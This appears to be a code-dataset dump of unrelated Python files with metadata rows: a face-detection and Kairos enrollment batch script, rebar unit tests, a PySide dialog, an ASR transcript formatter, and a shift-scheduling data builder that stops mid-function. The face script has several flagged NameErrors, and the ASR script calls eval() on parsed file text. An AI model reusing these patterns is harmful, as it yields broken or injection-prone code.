    raised NameError. We now fill the pre-initialized eye_data slots, so
    a missing eye yields an empty entry instead of a crash (callers
    already guard with try/except around the unpack).
    '''
    eye_data = [[], []]
    # face_data[idx]['landmarks'] is a list of dictionaries. We scan for
    # the entries whose 'type' is LEFT_EYE or RIGHT_EYE.
    for lm in face_data[face_idx]['landmarks']:
        if lm['type'] == 'LEFT_EYE':
            eye_data[0] = get_location_from_landmark_dict(lm)
        elif lm['type'] == 'RIGHT_EYE':
            eye_data[1] = get_location_from_landmark_dict(lm)
    return eye_data
def get_index_of_largest_eye_distance(x_distances):
    '''
    Return the index of the maximum value in the x_distances list.
    Ties resolve to the first (lowest-index) occurrence.
    '''
    return max(range(len(x_distances)), key=lambda i: x_distances[i])
def calculate_relative_difference(max_distance, runner_up_distance):
    '''
    Relative difference between the max distance and the runner-up:
        Rel_Diff = (max_distance - runner_up) / max_distance
    Raises ZeroDivisionError when max_distance is 0 (callers catch it).
    '''
    gap = max_distance - runner_up_distance
    return gap / max_distance
class face_direction(object):
    '''
    Classify a face by its (absolute) pan angle, in degrees:
        <= 30      FORWARD
        (30, 80]   ANGLED
        > 80       SIDE_VIEW
    '''
    # (enum code, label, inclusive upper bound), in ascending order.
    _BANDS = ((0, 'FORWARD', 30), (1, 'ANGLED', 80))

    def __init__(self, pan_angle):
        self.pan_angle = pan_angle
        for code, label, upper in self._BANDS:
            if pan_angle <= upper:
                self._direction = en.cenum(code, label)
                break
        else:
            # Anything beyond the last band is a side view.
            self._direction = en.cenum(2, 'SIDE_VIEW')

    @property
    def d(self):
        '''Name of the direction category (FORWARD / ANGLED / SIDE_VIEW).'''
        return self._direction.name
class face_difference(object):
    '''
    Categorize the relative face-size difference rel_diff, a float on
    (0, 1) from calculate_relative_difference:
        <= 0.08        EXTRA_SMALL
        (0.08, 0.12]   SMALL
        (0.12, 0.20]   MEDIUM
        (0.20, 0.60]   LARGE
        > 0.60         EXTRA_LARGE
    '''
    # (enum code, label, inclusive upper bound), in ascending order.
    # Code 1 is unused to preserve the original enum numbering.
    _BANDS = ((0, 'EXTRA_SMALL', 0.08), (2, 'SMALL', 0.12),
              (3, 'MEDIUM', 0.20), (4, 'LARGE', 0.60))

    def __init__(self, rel_diff):
        self.rel_diff = rel_diff
        for code, label, upper in self._BANDS:
            if rel_diff <= upper:
                self.category = en.cenum(code, label)
                break
        else:
            self.category = en.cenum(5, 'EXTRA_LARGE')

    @property
    def name(self):
        '''Name of the size-difference category.'''
        return self.category.name
def create_exclude_list(exclude_filename):
    '''
    Returns a list of filenames in the exclude_filename file (one per
    line, whitespace-stripped). These are the filenames that should be
    excluded from processing.
    '''
    names = []
    with open(exclude_filename) as exclude_file:
        for raw_line in exclude_file:
            names.append(raw_line.strip())
    return names
if __name__ == '__main__':
    # Batch driver: run Google Vision face detection over a directory of
    # jpegs, write annotated images + JSON, then enroll single-face images
    # with the Kairos face API. This is clearly work-in-progress scratch
    # code -- several latent NameErrors are flagged below.
    # Visual Studio script arguments:
    # tst1\00AB500A-0006-0000-0000-000000000000.jpg --out 00AB500A-0006-0000-0000-000000000000_out.jpg --max-results 5
    # tst1\demo-image.jpg --out tst1\dog_out.jpg --max-results 3
    # tst1\00AB500A-0006-0000-0000-000000000000.jpg --face 00AB500A-0006-0000-0000-000000000000_face.jpg --land 00AB500A-0006-0000-0000-000000000000_land.jpg --max-results 5
    # tst1\02ED2000-0006-0000-0000-000000000000.jpg --face 02ED2000-0006-0000-0000-000000000000_face.jpg --land 02ED2000-0006-0000-0000-000000000000_land.jpg --max-results 5
    # fd = face_difference(0.30)
    # print(fd.name)
    # Log the Python environment for debugging.
    print(sys.prefix)
    print(sys.version)
    print(sys.path)
    # Input/output locations, hard coded for this batch run.
    src_root_dir = r'E:\_Ancestry\lfw\lfw_tmp_efghijk_orig'
    out_dir = r'E:\_Ancestry\lfw\lfw_output'
    out_suffix = '_face'
    #exclude_list_filename = 'exclude1.txt'
    #x_exclude = create_exclude_list(exclude_list_filename)
    # Google Vision API client ('discovery' and API_KEY come from module level).
    service = discovery.build('vision', 'v1', developerKey = API_KEY)
    # Kairos gallery subject id, incremented per enrolled face.
    # NOTE(review): 'id' shadows the builtin.
    id = 0
    x_files = get_list_of_matching_files(src_root_dir, ('*.jpg', '*.jpeg'))
    #for fn in x_files:
    #    input_face_fni = fni.fname_info(fullname=fn)
    #    basename =
    #    output_face_fni = fni.fname_info(dirname=out_dir, basename=input_face_fni.basename, suffix=out_suffix)
    #    (dir, filename) = os.path.split(fn)
    #    (basename, ext) = os.path.splitext(filename)
    for fn in x_files:
        #if fn in x_exclude:
        #    msg = '%s | %s' % ('Exclude', fn)
        #    print(msg)
        #    continue
        # NOTE(review): 'basename' is read below but never assigned in this
        # loop -- the os.path.split/splitext lines deriving it from 'fn' are
        # commented out above, so this raises NameError at runtime.
        # Name of the output image file (with the out_suffix)
        face_fn = basename + out_suffix + '.jpg'
        full_output_face_fn = os.path.join(out_dir, face_fn)
        # Name of the output JSON file (.json ext)
        json_fn = basename + '.json'
        full_output_json_fn = os.path.join(out_dir, json_fn)
        try:
            (result, base_filename, xz_face_data, errmsg) = detect_and_annotate(fn, full_output_face_fn, full_output_json_fn, service, 3)
        except Exception as e:
            # NOTE(review): 'filename' is undefined in this scope; the
            # message should use 'fn' (as written, printing it would itself
            # raise NameError).
            print('Exception calling detect_and_annotate on: %s, Details: %s' % (filename, str(e)))
            continue
        if not result:
            google_result = 'Failure'
        else:
            google_result = 'Success'
        num_faces = len(xz_face_data)
        # Single face: enroll it with Kairos and log one summary row.
        if num_faces == 1:
            try:
                (response_code, z_attributes) = kairos_face.enroll_face(id, 'gallery13', file=fn)
                kairos_result = 'Success'
            except Exception as e:
                # NOTE(review): on failure 'kairos_result' and 'z_attributes'
                # remain unbound, so the lines below raise NameError; the
                # 'msg' built here is also immediately overwritten.
                msg = 'Exception in enroll_face for %s. Details: %s' % (basename, str(e))
            face_idx = 0
            gender = z_attributes['gender']['type']
            age = z_attributes['age']
            confidence = z_attributes['confidence']
            headwear_likelihood = xz_face_data[0]['headwear_likelihood']
            eye_distance = xz_face_data[0]['eye_distance']
            pan_angle = xz_face_data[0]['face_angles']['pan']
            #pan_angle = xz_face_angles[0]['pan']
            #eye_distance = x_distances[0]
            msg = '%s | %s | %s | %d | %s | %s | %s | %s | %s | %s | %s | %s' % (google_result, kairos_result, basename, face_idx, headwear_likelihood, gender, age, confidence, str(pan_angle), str(eye_distance), fn, errmsg)
            print(msg)
            id += 1
        # More than 1 face slightly complicates things ...
        else:
            # We only care about the "extra" face if it meets certain conditions ...
            try:
                x_faces_to_keep = select_faces_to_keep(base_filename, xz_face_data)
            except Exception as e:
                print('Exception in select_faces_to_keep on %s. Details: %s' % (base_filename, str(e)))
                continue
            # NOTE(review): multi-face enrollment is disabled ('if False').
            # 'xrange' is Python 2 only, and 'headwear_likelihood'/'errmsg'
            # used below may be unbound in this branch.
            if False:
                # Iterate over the faces we are going to keep...
                for face_idx in xrange(0, num_faces):
                    try:
                        (response_code, z_attributes) = kairos_face.enroll_face(id, 'gallery13', file=fn)
                        kairos_result = 'Success'
                    except Exception as e:
                        msg = 'Exception in enroll_face for %s. Details: %s' % (basename, str(e))
                    gender = z_attributes['gender']['type']
                    age = z_attributes['age']
                    confidence = z_attributes['confidence']
                    msg = '%s | %s | %s | %d | %s | %s | %s | %s | %s | %s' % (google_result, kairos_result, basename, face_idx, headwear_likelihood, gender, age, confidence, fn, errmsg)
                    print(msg)
                    id += 1
    # if num_faces == 1:
    #     try:
    #         (response_code, z_attributes) = kairos_face.enroll_face(id, 'gallery13', file=fn)
    #         kairos_result = 'Success'
    #     except Exception as e:
    #         msg = 'Exception in enroll_face for %s. Details: %s' % (basename, str(e))
    #     gender = z_attributes['gender']['type']
    #     age = z_attributes['age']
    #     confidence = z_attributes['confidence']
    # else:
    #     gender = 'UNKNOWN_DUE_TO_MULTIPLE_FACES'
    #     age = 'UNKNOWN_DUE_TO_MULTIPLE_FACES'
    #     confidence = 'UNKNOWN_DUE_TO_MULTIPLE_FACES'
    #msg = '%s | %s | %s | %d | %s | %s | %s | %s | %s | %s' % (google_result, kairos_result, basename, num_faces, headwear_likelihood, gender, age, confidence, fn, errmsg)
    #print(msg)
    #id += 1
    #parser = argparse.ArgumentParser(description='Detects faces in the given image.')
    #parser.add_argument('input_image', help='the image you\'d like to detect faces in.')
    #parser.add_argument('--face', dest='face_output', default='face.jpg', help='the name of the face output file.')
    #parser.add_argument('--land', dest='land_output', default='face.jpg', help='the name of the landmark output file.')
    #parser.add_argument('--max-results', dest='max_results', default=4, help='the max results of face detection.')
    #args = parser.parse_args()
    #main(args.input_image, args.face_output, args.land_output, args.max_results)
    print('Done!')
7a3207755b382e0dbaeacf1643ede4b9c1101673 | 41 | py | Python | pii_crypt/__init__.py | jmilagroso/pii_crypt | ada156d6b85ada9c19d28cab8fc1b8d1c7e6a0a7 | [
"MIT"
] | null | null | null | pii_crypt/__init__.py | jmilagroso/pii_crypt | ada156d6b85ada9c19d28cab8fc1b8d1c7e6a0a7 | [
"MIT"
] | 18 | 2021-07-19T15:37:44.000Z | 2022-03-16T20:27:06.000Z | pii_crypt/__init__.py | jmilagroso/pii_crypt | ada156d6b85ada9c19d28cab8fc1b8d1c7e6a0a7 | [
"MIT"
] | 2 | 2021-08-13T00:29:04.000Z | 2022-03-30T00:41:34.000Z | from pii_crypt.pii_crypt import PIICrypt
| 20.5 | 40 | 0.878049 | from pii_crypt.pii_crypt import PIICrypt
| 0 | 0 | 0 |
a4bc2186bb3e8677879261e010f1cfbd360c8359 | 1,502 | py | Python | msoft-format.py | wallscope-research/incremental-asr-evaluation | d4e79b49b8b309888992ed96bd69d3d624098abf | [
"Apache-2.0"
] | null | null | null | msoft-format.py | wallscope-research/incremental-asr-evaluation | d4e79b49b8b309888992ed96bd69d3d624098abf | [
"Apache-2.0"
] | null | null | null | msoft-format.py | wallscope-research/incremental-asr-evaluation | d4e79b49b8b309888992ed96bd69d3d624098abf | [
"Apache-2.0"
] | null | null | null | from universal import process, clean_csv, add_trans_chunk
import sys
import re
# The infile is the system trancript.
infile = sys.argv[1]
# Using the system output name, the relevant universal format and full transcripts are gathered.
filename_prep = re.search(r"(?<=system-output\/)(.*?)(?=\.txt)", infile).group(0)
outfile = "./results/msoft/universal/msoft-" + filename_prep + ".csv"
trans_file = "./results/msoft/system-trans-text/msoft-" + filename_prep + "-trans.txt"
# setting initial utterance as jiwer can't handle empty strings.
# tsoft = the start of the file.
prev = "tsotf"
utt = ""
# Microsoft specific processing.
# This function extracts each new hypothesis with its time and processes it.
# Simultaneously, finalised hypotheses are stored for final WER calculations.
with open(infile, 'r') as f:
for line in f:
if line.startswith("RECOGNIZING"):
relevant_info = re.search(r"\{(.*?)\}", line).group(0)
dictionary = eval(relevant_info)
time = dictionary.get("Duration") + dictionary.get("Offset")
utt = dictionary.get("Text")
process(outfile, time, prev, utt)
prev = utt
elif line.startswith("JSON"):
prev = "tsotf"
transcript = re.search(r"(?<=DisplayText\":\")(.*?)(?=\")", line)
if transcript:
transcript = transcript.group(0)
add_trans_chunk(trans_file, transcript.lower())
# Universal output finalised.
clean_csv(outfile) | 39.526316 | 96 | 0.654461 | from universal import process, clean_csv, add_trans_chunk
import sys
import re
# The infile is the system trancript.
infile = sys.argv[1]
# Using the system output name, the relevant universal format and full transcripts are gathered.
filename_prep = re.search(r"(?<=system-output\/)(.*?)(?=\.txt)", infile).group(0)
outfile = "./results/msoft/universal/msoft-" + filename_prep + ".csv"
trans_file = "./results/msoft/system-trans-text/msoft-" + filename_prep + "-trans.txt"
# setting initial utterance as jiwer can't handle empty strings.
# tsoft = the start of the file.
prev = "tsotf"
utt = ""
# Microsoft specific processing.
# This function extracts each new hypothesis with its time and processes it.
# Simultaneously, finalised hypotheses are stored for final WER calculations.
with open(infile, 'r') as f:
for line in f:
if line.startswith("RECOGNIZING"):
relevant_info = re.search(r"\{(.*?)\}", line).group(0)
dictionary = eval(relevant_info)
time = dictionary.get("Duration") + dictionary.get("Offset")
utt = dictionary.get("Text")
process(outfile, time, prev, utt)
prev = utt
elif line.startswith("JSON"):
prev = "tsotf"
transcript = re.search(r"(?<=DisplayText\":\")(.*?)(?=\")", line)
if transcript:
transcript = transcript.group(0)
add_trans_chunk(trans_file, transcript.lower())
# Universal output finalised.
clean_csv(outfile) | 0 | 0 | 0 |
8ab199c3c2b997aeba40c8874ef806a8674f8b19 | 49 | py | Python | Flask-todolist-Sqlite3-master/venv/lib/python3.6/tokenize.py | IncredibleDraco/MyScholar | 272aafa33f7227d1bc0d937d046788cbabede453 | [
"Apache-2.0"
] | null | null | null | Flask-todolist-Sqlite3-master/venv/lib/python3.6/tokenize.py | IncredibleDraco/MyScholar | 272aafa33f7227d1bc0d937d046788cbabede453 | [
"Apache-2.0"
] | null | null | null | Flask-todolist-Sqlite3-master/venv/lib/python3.6/tokenize.py | IncredibleDraco/MyScholar | 272aafa33f7227d1bc0d937d046788cbabede453 | [
"Apache-2.0"
] | 1 | 2019-11-25T10:25:21.000Z | 2019-11-25T10:25:21.000Z | /home/sheldon/anaconda3/lib/python3.6/tokenize.py | 49 | 49 | 0.836735 | /home/sheldon/anaconda3/lib/python3.6/tokenize.py | 0 | 0 | 0 |
6e510c7e69d1c10e4a1f13a06328e422101135ca | 2,202 | py | Python | tests/test_rebar.py | SurajDadral/pyconcrete | 479cce3fbe6754243b1df7c555ed1ac66ab6b23e | [
"MIT"
] | 19 | 2019-03-27T18:34:38.000Z | 2021-10-29T23:44:04.000Z | tests/test_rebar.py | SurajDadral/pyconcrete | 479cce3fbe6754243b1df7c555ed1ac66ab6b23e | [
"MIT"
] | 1 | 2019-07-19T02:48:47.000Z | 2019-07-23T04:40:54.000Z | tests/test_rebar.py | SurajDadral/pyconcrete | 479cce3fbe6754243b1df7c555ed1ac66ab6b23e | [
"MIT"
] | 7 | 2019-05-20T05:49:37.000Z | 2021-12-27T23:41:23.000Z | import pytest
import copy
from pyconcrete import rebar
@pytest.fixture
@pytest.fixture
@pytest.fixture
# def test_real_length(r1, lr1, ur1):
# assert r1.real_length == 5
# assert lr1.real_length == 200
# assert ur1.real_length == 250
| 17.902439 | 71 | 0.565395 | import pytest
import copy
from pyconcrete import rebar
@pytest.fixture
def r1():
    # Single straight rebar: length 5, diameter 20, inserted at the origin.
    r = rebar.Rebar(
        length=5,
        diameter=20,
        count=1,
        insert=(0, 0))
    return r
@pytest.fixture
def lr1():
    # Pair of L-shaped rebars, top/left aligned, inserted at (10, 20).
    r = rebar.LRebar(
        length=5,
        diameter=20,
        count=2,
        insert=(10, 20),
        v_align='top',
        h_align='left')
    return r
@pytest.fixture
def ur1():
    # Four U-shaped rebars of length 200, bottom aligned, at the origin.
    r = rebar.URebar(
        length=200,
        diameter=16,
        count=4,
        insert=(0, 0),
        v_align='bot')
    return r
def test_length(r1):
    # length round-trips from the constructor.
    assert r1.length == 5
def test_diameter(r1):
    # diameter round-trips from the constructor.
    assert r1.diameter == 20
def test_count(r1):
    # count round-trips from the constructor.
    assert r1.count == 1
def test_insert(r1):
    # insert point round-trips from the constructor.
    assert r1.insert == (0, 0)
def test_points(r1):
    # A straight bar renders as its two endpoints along the x axis.
    pts = [(0, 0), (5, 0)]
    assert r1.points() == pts
def test_length_L(lr1):
    # L-bar length round-trips from the constructor.
    assert lr1.length == 5
def test_diameter_l(lr1):
    # L-bar diameter round-trips from the constructor.
    assert lr1.diameter == 20
def test_count_l(lr1):
    # L-bar count round-trips from the constructor.
    assert lr1.count == 2
def test_insert_l(lr1):
    # L-bar insert point round-trips from the constructor.
    assert lr1.insert == (10, 20)
def test_points_l(lr1):
    # Top/left L-bar: vertical leg dropping from the insert, then the
    # horizontal run to the right.
    pts = [(10, 14), (10, 20), (15, 20)]
    assert lr1.points() == pts
def test_points_u(ur1):
    # Bottom-aligned U-bar: upturned legs of height 6 at both ends.
    pts = [(0, 6), (0, 0), (200, 0), (200, 6)]
    assert ur1.points() == pts
def test_points_along(r1, lr1, ur1):
    # points_along yields the three interior quarter points of the run.
    assert r1.points_along() == [(1.25, 0), (2.5, 0), (3.75, 0)]
    assert lr1.points_along() == [(11.25, 20), (12.5, 20), (13.75, 20)]
    assert ur1.points_along() == [(50, 0), (100, 0), (150, 0)]
def test_text(r1, lr1, ur1):
    # Annotation label has the form '<count>~<diameter>'.
    assert r1.text == '1~20'
    assert lr1.text == '2~20'
    assert ur1.text == '4~16'
def test_text_len(r1, ur1):
    # Length label has the form 'L=<length>' and must not change when the
    # drawing is scaled.
    assert r1.text_len == 'L=5'
    assert ur1.text_len == 'L=200'
    r_scale = copy.deepcopy(r1)
    r_scale.scale(75, 20)
    assert r_scale.text_len == 'L=5'
def test_xy_level(r1, lr1, ur1):
    # x1/x2 are the horizontal extents of the run; y is its elevation.
    assert r1.x1 == 0
    assert r1.x2 == 5
    assert r1.y == 0
    assert ur1.x1 == 0
    assert ur1.x2 == 200
    assert ur1.y == 0
    assert lr1.x1 == 10
    assert lr1.x2 == 15
    assert lr1.y == 20
# def test_real_length(r1, lr1, ur1):
# assert r1.real_length == 5
# assert lr1.real_length == 200
# assert ur1.real_length == 250
| 1,521 | 0 | 411 |
e3d7dce2a490922ec373ed82c8d9594a8acddd24 | 3,212 | py | Python | gui/qt_ui/EditGridQT.py | victorgabr/pps | dfe3fae64fd4dedde85204643f9c797c0373f96c | [
"BSD-3-Clause"
] | 7 | 2018-11-18T07:11:05.000Z | 2021-05-06T21:53:40.000Z | gui/qt_ui/EditGridQT.py | victorgabr/pps | dfe3fae64fd4dedde85204643f9c797c0373f96c | [
"BSD-3-Clause"
] | 9 | 2019-09-23T16:34:09.000Z | 2020-05-26T18:49:43.000Z | gui/qt_ui/EditGridQT.py | victorgabr/pps | dfe3fae64fd4dedde85204643f9c797c0373f96c | [
"BSD-3-Clause"
] | 2 | 2019-04-18T14:34:31.000Z | 2019-06-19T19:34:33.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'C:\Users\Victor\Dropbox\DFR\film2dose\qt_ui\edit_grid.ui'
#
# Created: Tue Sep 29 14:53:43 2015
# by: pyside-uic 0.2.15 running on PySide 1.2.2
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
| 48.666667 | 118 | 0.683064 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'C:\Users\Victor\Dropbox\DFR\film2dose\qt_ui\edit_grid.ui'
#
# Created: Tue Sep 29 14:53:43 2015
# by: pyside-uic 0.2.15 running on PySide 1.2.2
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(392, 125)
self.gridLayout = QtGui.QGridLayout(Dialog)
self.gridLayout.setObjectName("gridLayout")
self.ny_spin = QtGui.QSpinBox(Dialog)
self.ny_spin.setObjectName("ny_spin")
self.gridLayout.addWidget(self.ny_spin, 4, 0, 1, 1)
self.label = QtGui.QLabel(Dialog)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 3, 0, 1, 1)
self.label_2 = QtGui.QLabel(Dialog)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 3, 1, 1, 1)
self.label_4 = QtGui.QLabel(Dialog)
self.label_4.setObjectName("label_4")
self.gridLayout.addWidget(self.label_4, 0, 1, 1, 1)
self.label_3 = QtGui.QLabel(Dialog)
self.label_3.setObjectName("label_3")
self.gridLayout.addWidget(self.label_3, 0, 0, 1, 1)
self.yd_spin = QtGui.QDoubleSpinBox(Dialog)
self.yd_spin.setProperty("value", 0.0)
self.yd_spin.setObjectName("yd_spin")
self.gridLayout.addWidget(self.yd_spin, 4, 1, 1, 1)
self.buttonBox = QtGui.QDialogButtonBox(Dialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtGui.QDialogButtonBox.Cancel | QtGui.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.gridLayout.addWidget(self.buttonBox, 1, 3, 1, 1)
self.nx_spin = QtGui.QSpinBox(Dialog)
self.nx_spin.setProperty("value", 0)
self.nx_spin.setObjectName("nx_spin")
self.gridLayout.addWidget(self.nx_spin, 1, 0, 1, 1)
self.xd_spin = QtGui.QDoubleSpinBox(Dialog)
self.xd_spin.setSingleStep(1.0)
self.xd_spin.setProperty("value", 0.0)
self.xd_spin.setObjectName("xd_spin")
self.gridLayout.addWidget(self.xd_spin, 1, 1, 1, 1)
self.retranslateUi(Dialog)
QtCore.QObject.connect(self.buttonBox, QtCore.SIGNAL("accepted()"), Dialog.accept)
QtCore.QObject.connect(self.buttonBox, QtCore.SIGNAL("rejected()"), Dialog.reject)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
Dialog.setWindowTitle(QtGui.QApplication.translate("Dialog", "Dialog", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("Dialog", "y points", None, QtGui.QApplication.UnicodeUTF8))
self.label_2.setText(
QtGui.QApplication.translate("Dialog", "y spacing (mm)", None, QtGui.QApplication.UnicodeUTF8))
self.label_4.setText(
QtGui.QApplication.translate("Dialog", "x spacing (mm)", None, QtGui.QApplication.UnicodeUTF8))
self.label_3.setText(QtGui.QApplication.translate("Dialog", "x points", None, QtGui.QApplication.UnicodeUTF8))
| 2,813 | 3 | 76 |
8971cf7bdc03885b5b25374ac539e3a70ab2dcbe | 32,516 | py | Python | pymwts/pymwtsio/tests/infiles/mwts_inputs_example/mwts_makedat.py | misken/pymwts | 8e301b5badbd65f5dec8894ccbe0f0859785d20c | [
"MIT"
] | null | null | null | pymwts/pymwtsio/tests/infiles/mwts_inputs_example/mwts_makedat.py | misken/pymwts | 8e301b5badbd65f5dec8894ccbe0f0859785d20c | [
"MIT"
] | null | null | null | pymwts/pymwtsio/tests/infiles/mwts_inputs_example/mwts_makedat.py | misken/pymwts | 8e301b5badbd65f5dec8894ccbe0f0859785d20c | [
"MIT"
] | null | null | null | #-------------------------------------------------------------------------------
# Name: mwts_makedat
# Purpose: mwts dat file creation
#
# Author: isken
#
# Created: 28/09/2011
# Copyright: (c) isken 2011
# Licence: <your licence>
#-------------------------------------------------------------------------------
#!/usr/bin/env python
import sys
import StringIO
import yaml
from numpy import *
import csv
import json
import itertools
"""
mwts_makedat is a module for reading input files for mwts problems
and creating an AMPL/GMPL data file.
It is a replacement for the ancient createssdat.c program that was
used to create AMPL/GMPL dat files for one week tour scheduling problems.
"""
def create_weekend_base(n_weeks):
    """
    Enumerate every possible weekends-worked pattern over n_weeks weeks.

    Each pattern is a tuple with one element per week; an element is a
    two-item list [d1, d2] giving the first and second day of that week's
    weekend (1 = worked, 0 = off).

    Input:
        n_weeks - number of weeks in scheduling horizon
    Output:
        List of all 4**n_weeks possible weekends-worked patterns. This
        exhaustive list is later filtered to keep only desirable patterns.

    Example: n_weeks = 4 --> 256 possible weekends worked patterns.
    """
    week_choices = [[0, 0], [1, 0], [0, 1], [1, 1]]
    # Cartesian product with one factor per week.
    return list(itertools.product(week_choices, repeat=n_weeks))
def filterpatterns(pattern,ttnum,wkendtype,ttspec):
    """
    Decide whether a candidate weekends-worked pattern should be kept.

    Inputs:
        pattern  - sequence of per-week [day1, day2] weekend flags
                   (1 = worked, 0 = off), as produced by create_weekend_base
        ttnum    - tour type number to look up in ttspec
        wkendtype - 1 --> weekend consists of Saturday and Sunday
                    2 --> weekend consists of Friday and Saturday
        ttspec   - dict with a 'tourtypes' list; each entry supplies the
                   limits used here ('max_days_worked', 'half_weekends_ok')

    Output: True --> keep pattern
            False --> discard pattern

    For now the rules are hard coded; a flexible approach to specifying
    filtering rules is still TODO.
    """
    n_weeks = len(pattern)
    keep = True
    # Limits for this tour type (assumes exactly one entry matches ttnum).
    tourtype = [t for t in ttspec['tourtypes'] if t['ttnum'] == ttnum]
    # No more than max_days_worked over the scheduling horizon
    # NOTE: 'sum' here is numpy's sum (module does 'from numpy import *'),
    # which flattens the nested per-week lists; the builtin sum would raise
    # TypeError on a sequence of lists.
    max_days_worked = tourtype[0]['max_days_worked']
    if not (sum(pattern) <= max_days_worked):
        keep = False
    # No consecutive weekends with one or more days worked
    # NOTE(review): 'ntuples' is defined elsewhere in this module --
    # presumably a width-2 sliding window over the weeks. The test
    # sum(pair) > 2 discards patterns with 3+ weekend days across two
    # consecutive weeks, which is weaker than the comment above; confirm.
    window = ntuples(pattern,2)
    for pair in window:
        if sum(pair) > 2:
            keep = False
    # No half-weekends
    if not tourtype[0]['half_weekends_ok'] and num_half_weekends(pattern,wkendtype) > 0:
        keep = False
    return keep
def num_full_weekends(x,wkendtype):
    """
    Count full weekends (both days worked) in a weekends-worked pattern.

    Inputs:
        x - list of 2-tuples, one per week; the tuple holds the first and
            second weekend day for that week (1 = worked, 0 = off).
        wkendtype - 1 --> weekend is Saturday/Sunday (spans the week
                          boundary, wrapping from the last week back to
                          the first)
                    2 --> weekend is Friday/Saturday (within one week)

    Output:
        Number of full weekends worked.

    Example:
        num_full_weekends([(0,1),(1,0),(0,1),(1,0)],1) == 2
        num_full_weekends([(0,1),(1,0),(0,1),(0,0)],1) == 1
        num_full_weekends([(1,1),(1,0),(1,1),(1,0)],2) == 2
        num_full_weekends([(0,1),(1,0),(0,1),(0,0)],2) == 0
    """
    n_weeks = len(x)
    if wkendtype == 2:
        # Fri/Sat weekend lives inside a single week: both flags set.
        return sum(1 for week in x if week[0] + week[1] == 2)
    # Sat/Sun weekend pairs day 2 of week j with day 1 of week j+1,
    # cyclically (the last week wraps around to the first).
    count = 0
    for j in range(n_weeks):
        nxt = (j + 1) % n_weeks
        if x[j][1] == 1 and x[nxt][0] == 1:
            count += 1
    return count
def num_half_weekends(x,wkendtype):
    """
    Count half weekends (exactly one day worked) in a weekends-worked
    pattern.

    Inputs:
        x - list of 2-tuples, one per week; the tuple holds the first and
            second weekend day for that week (1 = worked, 0 = off).
        wkendtype - 1 --> weekend is Saturday/Sunday (spans the week
                          boundary, wrapping from the last week back to
                          the first)
                    2 --> weekend is Friday/Saturday (within one week)

    Output:
        Number of half weekends worked.

    Example:
        num_half_weekends([(0,1),(1,0),(0,1),(1,0)],1) == 0
        num_half_weekends([(0,1),(1,0),(0,1),(0,0)],1) == 1
        num_half_weekends([(1,1),(1,0),(1,1),(1,0)],2) == 2
        num_half_weekends([(0,1),(1,0),(0,1),(0,0)],2) == 3
    """
    n_weeks = len(x)
    if wkendtype == 2:
        # Fri/Sat weekend lives inside a single week: exactly one flag set.
        return sum(1 for week in x if week[0] + week[1] == 1)
    # Sat/Sun weekend pairs day 2 of week j with day 1 of week j+1,
    # cyclically; a half weekend has exactly one of the pair worked.
    count = 0
    for j in range(n_weeks):
        nxt = (j + 1) % n_weeks
        if x[j][1] + x[nxt][0] == 1:
            count += 1
    return count
##param dmd_staff := [*,*,1] :
## 1 2 3 4 5 6 7 :=
## 1 5.0 4.0 4.0 4.0 5.0 5.0 5.0
## 2 5.0 4.0 4.0 4.0 5.0 5.0 5.0
## 3 5.0 4.0 4.0 4.0 5.0 5.0 5.0
## 4 5.0 4.0 4.0 4.0 5.0 5.0 5.0
def scalar_to_param(pname,pvalue,isStringIO=True):
    """
    Render a scalar as a GMPL dat parameter statement.

    Inputs:
        pname - parameter name in the GMPL file
        pvalue - value of the parameter
        isStringIO - when True the text is staged through a StringIO
                     buffer before being returned

    Output:
        GMPL dat code, e.g.:  param n_prds_per_day := 48;

    NOTE(review): both branches ultimately return a plain string (the
    True branch returns buffer.getvalue()), so the isStringIO flag has no
    observable effect -- confirm whether returning the StringIO object
    itself was intended.
    """
    statement = 'param %s := %s;\n' % (pname, str(pvalue))
    if not isStringIO:
        return statement
    staging = StringIO.StringIO()
    staging.write(statement)
    return staging.getvalue()
def list_to_param(pname,plist,reverseidx=False,isStringIO=True):
    """
    Render a (possibly nested) list as a GMPL dat parameter.

    Inputs:
        pname - parameter name to use in the GMPL file
        plist - list holding the parameter values (may be N-dimensional)
        reverseidx - True to reverse the order of the index tuple on each
                     row (effectively transposing the matrix)
        isStringIO - True to route the result through a StringIO buffer,
                     False to return the plain string

    Output:
        GMPL dat code such as:

        param midnight_thresh:=
        1 100
        2 100
        ;
    """
    rows = ['param ' + pname + ':=\n']
    # ndenumerate yields (index_tuple, value) pairs in C order; GMPL
    # indexes are 1-based, hence the +1 on every index component.
    for idx, val in ndenumerate(array(plist)):
        labels = [str(i + 1) for i in idx]
        if reverseidx:
            labels.reverse()
        rows.append(' '.join(labels) + ' ' + str(val) + '\n')
    rows.append(';\n')
    out = ''.join(rows)
    if not isStringIO:
        return out
    buf = StringIO.StringIO()
    buf.write(out)
    return buf.getvalue()
def shiftlencons_to_param(pname,ttspec,plist,isStringIO=True):
    """
    Render shift-length specific day/period bound inputs as a GMPL dat
    parameter.

    The generic list_to_param() cannot be used here because each tour
    type may allow a different number of shift lengths, making plist
    jagged and thus not convertible to a numpy array.

    Inputs:
        pname - parameter name to use in the GMPL file
        ttspec - tour type spec object loaded from the YAML mix file
        plist - jagged list indexed [tour type][shift length][week]
        isStringIO - True to route the result through a StringIO buffer,
                     False to return the plain string

    Output:
        GMPL dat rows of the form: tourtype shiftlength week value
    """
    lengths = get_lengths_from_mix(ttspec)
    pieces = ['param ' + pname + ':=\n']
    for t, ttrows in enumerate(plist):          # one entry per tour type
        ttnum = ttspec['tourtypes'][t]['ttnum']
        for s, weekvals in enumerate(ttrows):   # one entry per shift length
            # Translate this tour type's shift length into its global
            # 0-based position within the sorted length list.
            len_x = lengths.index(
                ttspec['tourtypes'][t]['shiftlengths'][s]['numbins'])
